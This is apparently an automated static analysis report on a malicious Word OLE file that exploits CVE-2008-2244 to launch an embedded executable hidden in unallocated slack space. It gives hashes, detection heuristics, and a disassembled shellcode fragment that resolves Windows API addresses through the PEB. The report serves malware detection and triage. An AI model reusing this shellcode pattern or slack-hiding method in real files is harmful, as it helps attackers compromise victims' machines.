Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2217e61a733cb22b…

MALICIOUS

Office (OLE)

47.6 KB Created: 2005-06-22 09:51:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 20e45b05818f3d5ee2b447027436dde2 SHA-1: 91d0225498e9690eac38c3c0fe257d5b146fa5a3 SHA-256: 2217e61a733cb22bf9f66c740c363c3e96462f4be3d0c722749b192b76b58342
410 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample is a Microsoft Word document that exploits CVE-2008-2244 to execute an embedded PE executable. The VBA macro is minimal and does not appear to contain malicious logic itself, but the embedded executable is the primary payload. The document body content is unrelated to the malicious functionality.

Heuristics 11

  • CVE-2008-2244 — Microsoft Word record-parsing payload critical CVE likely CVE_2008_2244
    Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
  • ClamAV: Win.Exploit.MS03-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Exploit.MS03-1
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    Attempted x86 opcode disassembly
    000019A5  648b1530000000    mov edx, dword ptr fs:[0x30]
    000019AC  e9df020000        jmp 0x1c90
    000019B1  8f85c4feffff      pop dword ptr [ebp - 0x13c]
    000019B7  8b420c            mov eax, dword ptr [edx + 0xc]
    000019BA  8b701c            mov esi, dword ptr [eax + 0x1c]
    000019BD  ad                lodsd eax, dword ptr [esi]
    000019BE  8b7808            mov edi, dword ptr [eax + 8]
    000019C1  89bdccfeffff      mov dword ptr [ebp - 0x134], edi
    000019C7  8b473c            mov eax, dword ptr [edi + 0x3c]
    000019CA  8b540778          mov edx, dword ptr [edi + eax + 0x78]
    000019CE  03d7              add edx, edi
    000019D0  8b5a20            mov ebx, dword ptr [edx + 0x20]
    000019D3  03df              add ebx, edi
    000019D5  33c9              xor ecx, ecx
    000019D7  41                inc ecx
    000019D8  8b348b            mov esi, dword ptr [ebx + ecx*4]
    000019DB  03f7              add esi, edi
    000019DD  b847657450        mov eax, 0x50746547
    000019E2  3b06              cmp eax, dword ptr [esi]
    000019E4  75f1              jne 0x19d7
    000019E6  b8726f6341        mov eax, 0x41636f72
    000019EB  3b4604            cmp eax, dword ptr [esi + 4]
    000019EE  75e7              jne 0x19d7
    000019F0  8b5a24            mov ebx, dword ptr [edx + 0x24]
    000019F3  03df              add ebx, edi
    000019F5  668b0c4b          mov cx, word ptr [ebx + ecx*2]
    000019F9  8b5a1c            mov ebx, dword ptr [edx + 0x1c]
    000019FC  03df              add ebx, edi
    000019FE  8b048b            mov eax, dword ptr [ebx + ecx*4]
    00001A01  03c7              add eax, edi
    00001A03  89                .byte 0x89
    00001A04  85                .byte 0x85
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 48,710 bytes but its declared streams total only 21,777 bytes — 26,933 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • VBA project contains no executable statements low OLE_VBA_MACROS
    Document contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 369 bytes
SHA-256: 0a0073e6700d52a50d0c1e9ea0537e97be4dbdf563f1ead10aa7aa70adf4375d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "PropertyTreeCtl1, 0, 0, PROPERTYTREELib, PropertyTreeCtl"
embedded_office_00006a00.exe embedded-pe Office MZ+PE at offset 0x6A00 21574 bytes
SHA-256: 9cacee6c891d8ac59e2e7896a746b8da8e66221d5039696f804d5a36ea10b65e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.61, consistent with packed or encrypted content.